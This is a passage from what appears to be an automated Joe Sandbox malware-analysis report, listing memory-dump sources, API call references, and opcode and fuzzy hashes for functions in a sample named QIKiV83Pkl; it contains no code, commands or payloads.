                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                • Opcode ID: aaa2af39e111db727d8f5e4a7749c21bc05f5f49defee5e51a9ac676c7fec898
                • Instruction ID: 6a39e10c1337ac521910ded172d837cc8ea33b189276895a8f9254f2a0aa826b
                • Opcode Fuzzy Hash: aaa2af39e111db727d8f5e4a7749c21bc05f5f49defee5e51a9ac676c7fec898
                • Instruction Fuzzy Hash: 4DD0A92824470638BC0837B8285A0A83348F862BB43E80B86E230CA2D2EE14A424A113
                APIs
                • DloadLock.DELAYIMP ref: 0088DC73
                • DloadProtectSection.DELAYIMP ref: 0088DC8F
                  • Part of subcall function 0088DE67: DloadObtainSection.DELAYIMP ref: 0088DE77
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Dload$Section$LockObtainProtect
                • String ID:
                • API String ID: 731663317-0
                • Opcode ID: 7d0ea133ba0fded73e23ca854802ce825e8d65880c3480547403b6cb9f81e2ce
                • Instruction ID: 51c93a86f9b8777d9537054c6733857d9824ee763ed5b00a526dad471753ad9a
                • Opcode Fuzzy Hash: 7d0ea133ba0fded73e23ca854802ce825e8d65880c3480547403b6cb9f81e2ce
                • Instruction Fuzzy Hash: EDD012B0520300AAD611FB28A98671C33B1F704788FA80702F206C7AE0DFF85C80DB06
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: 4a4c54ba779860d88c1a65dbade18d9de169a333b53a240103477891876535ac
                • Instruction ID: f8eb0b7d0aeb1e646819fb07733d72980a9f1ca488abc075d71297f490ba9976
                • Opcode Fuzzy Hash: 4a4c54ba779860d88c1a65dbade18d9de169a333b53a240103477891876535ac
                • Instruction Fuzzy Hash: 39C01232058201BECF020BB0DC09D2FBBA8BBA5212F05CA0AB2A5C0060C238C010DB11
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 134a104da001a38b7dbd0f36d5f81736b2700a0c46bf8c3de6ba4709016ac555
                • Instruction ID: 7eba037839a326032daa89cde6088d3727b90075a57f7344cff4c2f835ae7a57
                • Opcode Fuzzy Hash: 134a104da001a38b7dbd0f36d5f81736b2700a0c46bf8c3de6ba4709016ac555
                • Instruction Fuzzy Hash: 0FC1A430A042549FEF15CF6CC489BA97BA5FF46314F0880B9EC49DB69ADB31D944CB61
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 546d9f67184fd1a194467b694ca3e47ba25242136698f04c3c6d13551e372a7c
                • Instruction ID: 072ae40e374fbb93bce1013f574c7438991bba3faa8f343c187622343ebbfed2
                • Opcode Fuzzy Hash: 546d9f67184fd1a194467b694ca3e47ba25242136698f04c3c6d13551e372a7c
                • Instruction Fuzzy Hash: 3A71AE71104F44AEDB25DB74CC41AE7BBE8FB14301F44891EE59E87246DB32AA48EF12
                APIs
                • __EH_prolog.LIBCMT ref: 00878384
                  • Part of subcall function 00871380: __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00871380: new.LIBCMT ref: 008713FE
                  • Part of subcall function 008719A6: __EH_prolog.LIBCMT ref: 008719AB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 7d44fa9448794f8ef626f358d8a0fdf22c67d4e4f3abf8f36220df1601586486
                • Instruction ID: 1b906070a19457c721c02ba1cdb98bc17cc1e59846faba9373ae72981759b335
                • Opcode Fuzzy Hash: 7d44fa9448794f8ef626f358d8a0fdf22c67d4e4f3abf8f36220df1601586486
                • Instruction Fuzzy Hash: 9C41C4318406549ADF20EB64CC59BEA73A8FF10300F0480EAE58ED3496DFB49EC8DB51
                APIs
                • __EH_prolog.LIBCMT ref: 00871E05
                  • Part of subcall function 00873B3D: __EH_prolog.LIBCMT ref: 00873B42
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 91ce56df2f5d7cc3ca040d9ef7329c33cd02382371873bbbffff286425d40818
                • Instruction ID: 304bb51770d3e764faf59f16e7a96c0baaf916d74d57cd499da6b15e1312588d
                • Opcode Fuzzy Hash: 91ce56df2f5d7cc3ca040d9ef7329c33cd02382371873bbbffff286425d40818
                • Instruction Fuzzy Hash: D62139329041089FCF15EF9DD9459EEBBF6FF58300B10406DE849A7651CB329E10DB62
                APIs
                • __EH_prolog.LIBCMT ref: 0088A7C8
                  • Part of subcall function 00871380: __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00871380: new.LIBCMT ref: 008713FE
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c49f0fcbbd91c3c299a0e737d9932cbda8fbe2790ac19b697e2b7e51365b1f68
                • Instruction ID: 492d5e81f9870f8b4ea3090fff9f764b655b06104eec285eb4d165bef7fcfecc
                • Opcode Fuzzy Hash: c49f0fcbbd91c3c299a0e737d9932cbda8fbe2790ac19b697e2b7e51365b1f68
                • Instruction Fuzzy Hash: 53213D71C042499ADF15EF98C9525EEB7B4FF19304F1044AAE809E7242DB35AE06DB62
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c17f67d85ccd93d5cfbad9ee98d7c3857d31cfe8f2f3ad13eeb6390a0a74d869
                • Instruction ID: 5eecd1a3b3f3dcdd72d519252e335c5ef7f07a9f064ddea6fc841cfaa3e70ba9
                • Opcode Fuzzy Hash: c17f67d85ccd93d5cfbad9ee98d7c3857d31cfe8f2f3ad13eeb6390a0a74d869
                • Instruction Fuzzy Hash: 3E115E73A00528ABCF26AAACCC519EEB736FF88750F058119F85DF7255DA35CD1087A1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction ID: 63581a2c1b3c2621c7f68b2514271cee897a9b3063019236607f6bedc4b7d12d
                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction Fuzzy Hash: 10F08C309047299FDB38DA78C941B2EB7E8FB51324F20C92AE49EC2694E770D880C742
                APIs
                • __EH_prolog.LIBCMT ref: 00875BDC
                  • Part of subcall function 0087B07D: __EH_prolog.LIBCMT ref: 0087B082
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 81257f7a52026833c25eb99989f8a2cd56c4b659599b472f27be5872027e4017
                • Instruction ID: f7ee7509ff1ed68e38c5d10054a890135a5e95a70282d2ead017b665f34856d7
                • Opcode Fuzzy Hash: 81257f7a52026833c25eb99989f8a2cd56c4b659599b472f27be5872027e4017
                • Instruction Fuzzy Hash: 1A018B31A00684DAC724F7ACC0953DDFBA4EF19300F80909DA99E93283CBB01B08C663
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a599d77ab6ec0a3727a3d38a95712188ce57b39870fc737f92dc3d89138e8503
                • Instruction ID: cc9ec33fc1bd749d937271e8cbbbbc31265e67d3995292bb831e6e5f9949075d
                • Opcode Fuzzy Hash: a599d77ab6ec0a3727a3d38a95712188ce57b39870fc737f92dc3d89138e8503
                • Instruction Fuzzy Hash: 77E0A921644627EAEF213B69AC01B9A3B88FB433A0F1E0220AC18E2080CE20CC0485A6
                APIs
                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0087968F,?,?,?,?,008A1FA1,000000FF), ref: 008796EB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: b3237d05732c90ec310a9e12ff90fdec086aaaf4077988e397db3c7cc261ced8
                • Instruction ID: 7b8b5e3041065c96a34672e93e455df1cdc96e1a2e9cb314dc112923cc6735dc
                • Opcode Fuzzy Hash: b3237d05732c90ec310a9e12ff90fdec086aaaf4077988e397db3c7cc261ced8
                • Instruction Fuzzy Hash: 45F05E31596B058FDB308A24D548792B7E5FB22725F04DB1ED0EF839E4A761E84D8F10
                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0087A4F5
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 39ab8f8230ece34f842bf2d06d94c1e361851fe0cb0daf72906fd32a9ebe90ca
                • Instruction ID: 901ab6195131b20ecd1e3e0fc8a94da72e69b68b0fa302527e1b3265672ede9a
                • Opcode Fuzzy Hash: 39ab8f8230ece34f842bf2d06d94c1e361851fe0cb0daf72906fd32a9ebe90ca
                • Instruction Fuzzy Hash: A9F0B431009780AACA265BBC48047DABB91FF46321F04CA49F1FD82199C2B594C59723
                APIs
                • SetThreadExecutionState.KERNEL32(00000001), ref: 008806B1
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 42b8d684796c19201c5209f0d474d43704d9bdc5b1ab2489c8f9f3545c2bc756
                • Instruction ID: d26235f379a60896239a854ca96bb660c6424d3177ce042a8e0c034ec20eba6e
                • Opcode Fuzzy Hash: 42b8d684796c19201c5209f0d474d43704d9bdc5b1ab2489c8f9f3545c2bc756
                • Instruction Fuzzy Hash: 4DD0C22170421026DA21336CA8497FF1B0AFFC3710F080021B04DD37C69E4A489A4BA3
                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 00889D81
                  • Part of subcall function 00889B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00889B30
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction ID: d78999a7769f73cc94a7a416d065bc987413254dd6f6b415031fdc3fadafc4e1
                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction Fuzzy Hash: C9D0C73065420DBADF41BA759C02A7A7BE9FB00350F144175FC48D6151EF71DE20A766
                APIs
                • GetFileType.KERNELBASE(000000FF,00879887), ref: 00879995
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 2f112228cb624012d636a16a0e0d88d344c2508b5fc54873a469504102023d7d
                • Instruction ID: 750d69f292582868fd53794313e1840cfa7b1e10c6a2ab67767666b99026d4de
                • Opcode Fuzzy Hash: 2f112228cb624012d636a16a0e0d88d344c2508b5fc54873a469504102023d7d
                • Instruction Fuzzy Hash: 93D01231011540959F2146354D09299BF51FB83376B38C6A8E1A9C40A9D723C803F541
                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0088D43F
                  • Part of subcall function 0088AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088AC85
                  • Part of subcall function 0088AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088AC96
                  • Part of subcall function 0088AC74: IsDialogMessageW.USER32(000103EE,?), ref: 0088ACAA
                  • Part of subcall function 0088AC74: TranslateMessage.USER32(?), ref: 0088ACB8
                  • Part of subcall function 0088AC74: DispatchMessageW.USER32(?), ref: 0088ACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 2c87953fd63445c109f38259b4c5729ba16c2e7132ce619dbdba9c971a97dc9e
                • Instruction ID: d9b2ddb953886d42f8f96ceb05373907f2a8e76cbe56160d310bdb565ed144c1
                • Opcode Fuzzy Hash: 2c87953fd63445c109f38259b4c5729ba16c2e7132ce619dbdba9c971a97dc9e
                • Instruction Fuzzy Hash: F6D09E31144300ABDA162B55CE07F0F7BA6FB98B05F004655B348B40F28662AD20DB16
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 50442064a29a60713f22a6004f34f59ee597cf4cba4044648b8c0bad91da475c
                • Instruction ID: ee6648522eb7c11f854962a090faad7858d80be8642e3277f455a8eab8fc83b0
                • Opcode Fuzzy Hash: 50442064a29a60713f22a6004f34f59ee597cf4cba4044648b8c0bad91da475c
                • Instruction Fuzzy Hash: 62B0129526C3017C350831546C52C3B031CF4C2B113308A3BB309E01C1D8406C4C5532
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0fd9827994bb0318c3d6d51be702e9d09a993a1b5c297e2512f66234fe37c4d2
                • Instruction ID: b2228d555080c3ceb6288efb975171317c50c96e8eb78ada10300c536ab76b9e
                • Opcode Fuzzy Hash: 0fd9827994bb0318c3d6d51be702e9d09a993a1b5c297e2512f66234fe37c4d2
                • Instruction Fuzzy Hash: A0B0129526C3067C310871586C42D3B031CF4C3B11330852BB309D02C1D8406C081732
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5a011271781bbf55227f5c25568f35ae0265fab80f828513b6752080397771f8
                • Instruction ID: 1f6dd185d9103e941573b2feb518a573e57a24c016eda8c9d9444db83137990e
                • Opcode Fuzzy Hash: 5a011271781bbf55227f5c25568f35ae0265fab80f828513b6752080397771f8
                • Instruction Fuzzy Hash: 3DB0129126C2017C3108715C6C02D36032CF4C3B10330C52BB709D03C1D8406C0D1632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 727f15e219d796b744a94fb8795fea0a9bf8c277fdd2b7c212da93644594aaf7
                • Instruction ID: ab3b3bded0338d9c4d0b6dfbd517e3f36170cd1b0e6de77f659d168e00209818
                • Opcode Fuzzy Hash: 727f15e219d796b744a94fb8795fea0a9bf8c277fdd2b7c212da93644594aaf7
                • Instruction Fuzzy Hash: 2EB0129126C2017C310C715C6D02D36032CF4C2B10330C52BB309D03C1D8406C0E1632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ecd1ecf74a78a68804d4db669a1dedc82182cecfee8fd4f71d239f37643ec928
                • Instruction ID: 7cc1fc4056f0ed70fdab3abda9d303c08c0df0458bf8a705fe7fb567cbdbb0eb
                • Opcode Fuzzy Hash: ecd1ecf74a78a68804d4db669a1dedc82182cecfee8fd4f71d239f37643ec928
                • Instruction Fuzzy Hash: 4CB0129126C3017C3148715C6C02D36032CF4C2B10330C62BB309D03C1D8406C8D1632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7b21e5deb510886da947fb74da5910dea2f07f9491409e225783e14908ecd72b
                • Instruction ID: 9cb4c5d1a8a50d3d31096cd76cd8b0b0145485bf4ac58bbf7c9537afbf562825
                • Opcode Fuzzy Hash: 7b21e5deb510886da947fb74da5910dea2f07f9491409e225783e14908ecd72b
                • Instruction Fuzzy Hash: 63B012A126C201BC310871586C02D36031CF4C3B10330C52BB70DD02C1D8406C091632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4846d36c157e9e2a9799e65e2907ba05b5f343ede6f60a8ee3dce5d53295302c
                • Instruction ID: 75b339be5dfdecb20e39d8bb8391c2721bb31db8281f9abe91da829203a90430
                • Opcode Fuzzy Hash: 4846d36c157e9e2a9799e65e2907ba05b5f343ede6f60a8ee3dce5d53295302c
                • Instruction Fuzzy Hash: 68B012A126C301BC314871586C02D36031CF4C2B10330862BF30DD02C1D8406C491632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
